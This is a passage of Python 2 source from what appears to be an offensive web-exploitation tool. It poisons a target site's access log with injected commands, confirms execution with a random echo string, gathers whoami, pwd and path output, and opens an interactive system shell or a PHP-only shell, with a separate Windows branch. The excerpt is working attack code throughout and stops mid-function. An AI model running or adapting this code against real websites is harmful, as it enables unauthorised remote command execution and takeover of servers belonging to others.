(keyword, ologurl, logmain)
| 959 | exit() |
| 960 | |
| 961 | def simpleGETorHEAD(keyword, ologurl, logmain): |
| 962 | randStr = generateRandom() |
| 963 | send_access_log_cmd("echo %s" %randStr, logmain, keyword) |
| 964 | |
| 965 | if(access_log_reverse): |
| 966 | r = requests.get(url,headers=gen_headers, verify=False) |
| 967 | else: |
| 968 | r = requests.get(ologurl,headers=gen_headers,timeout=15, verify=False) |
| 969 | |
| 970 | resp = r.text |
| 971 | print colored("\nTrying to inject the website using simple %s requests." %keyword, "white") |
| 972 | |
| 973 | if(access_control(resp,keyword,randStr)): |
| 974 | print "[+] The website seems to be vulnerable. Opening a System Shell..\n" |
| 975 | time.sleep(1) |
| 976 | cmd = "" |
| 977 | |
| 978 | send_access_log_cmd("whoami", logmain, keyword) |
| 979 | whoami = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True) |
| 980 | send_access_log_cmd("pwd", logmain, keyword) |
| 981 | pwd = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True) |
| 982 | |
| 983 | access_log_while(whoami,logmain,pwd,ologurl,keyword,False) |
| 984 | |
| 985 | # ------------------------------------------------------------------------------------------- |
| 986 | else: |
| 987 | # check if Windows operating system |
| 988 | # ----------------------------------------------------- # |
| 989 | send_access_log_cmd("path",logmain,keyword) |
| 990 | path = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True) |
| 991 | time.sleep(1) |
| 992 | |
| 993 | if(checkIfWindows(path)): |
| 994 | # trying to get current Windows user by using 'whoami' command |
| 995 | send_access_log_cmd("whoami", logmain, keyword) |
| 996 | whoami = isUnknown(cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)) |
| 997 | |
| 998 | if("?" in whoami): |
| 999 | # Try to get current_user using PHP function 'get_current_user()' |
| 1000 | send_access_log_cmd("get_current_user();", logmain, keyword+"_PHP") |
| 1001 | whoami = isUnknown(cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)) |
| 1002 | |
| 1003 | send_access_log_cmd("cd", logmain, keyword) |
| 1004 | pwd = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True) |
| 1005 | access_log_while(whoami,logmain,pwd,ologurl,keyword,True) |
| 1006 | |
| 1007 | # ----------------------------------------------------- # |
| 1008 | |
| 1009 | # Try to open an only PHP-based shell |
| 1010 | rand_str = generateRandom() |
| 1011 | |
| 1012 | send_access_log_cmd("echo '%s';" %rand_str,logmain,keyword+"_PHP") |
| 1013 | resp = (requests.get(ologurl,headers=gen_headers,timeout=15, verify=False)).text |
| 1014 | if(access_control(resp,keyword+"_PHP",rand_str)): |
| 1015 | print "[+] The website seems to be vulnerable. Opening a Shell.." |
| 1016 | time.sleep(1) |
| 1017 | onlyPhpPrint() |
| 1018 |
no test coverage detected